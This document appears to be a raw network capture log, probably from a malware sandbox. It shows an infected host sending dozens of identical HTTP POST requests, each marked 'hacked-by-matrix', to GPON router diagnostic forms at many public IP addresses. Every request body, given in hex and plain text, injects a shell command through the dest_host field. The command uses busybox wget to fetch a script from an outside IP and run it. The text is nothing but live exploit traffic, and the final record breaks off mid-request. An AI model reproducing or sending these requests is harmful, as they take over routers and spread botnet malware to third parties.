                                                        Mar 21, 2024 05:23:17.713058949 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1177192.168.2.13405585.87.70.50443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713077068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1178192.168.2.1339408118.31.219.3443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713084936 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1179192.168.2.1335938212.85.199.217443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713109016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1180192.168.2.1335066109.19.143.94443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713140011 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1181192.168.2.1335440109.247.36.74443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713166952 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1182192.168.2.1354482118.150.202.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713171959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1183192.168.2.1345696212.234.176.121443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713193893 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1184192.168.2.1356098212.137.181.41443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713217020 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1185192.168.2.1353756109.225.9.141443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713264942 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1186192.168.2.1357248109.236.230.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713268995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1187192.168.2.1341636118.142.137.16443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713316917 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1188192.168.2.13335325.99.147.7443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713323116 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1189192.168.2.135923042.160.222.250443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713342905 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1190192.168.2.1349292212.221.119.218443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713381052 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1191192.168.2.1358472109.239.22.147443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713408947 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192192.168.2.1345076109.243.216.181443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713418007 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1193192.168.2.134051242.125.66.5443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713435888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1194192.168.2.1346536109.137.248.113443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713491917 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1195192.168.2.1336448109.43.5.35443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713491917 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1196192.168.2.135694042.65.75.27443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713522911 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1197192.168.2.1353682118.75.90.79443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713530064 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1198192.168.2.1336582118.101.26.4443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713541031 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1199192.168.2.135617842.31.215.157443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.713576078 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
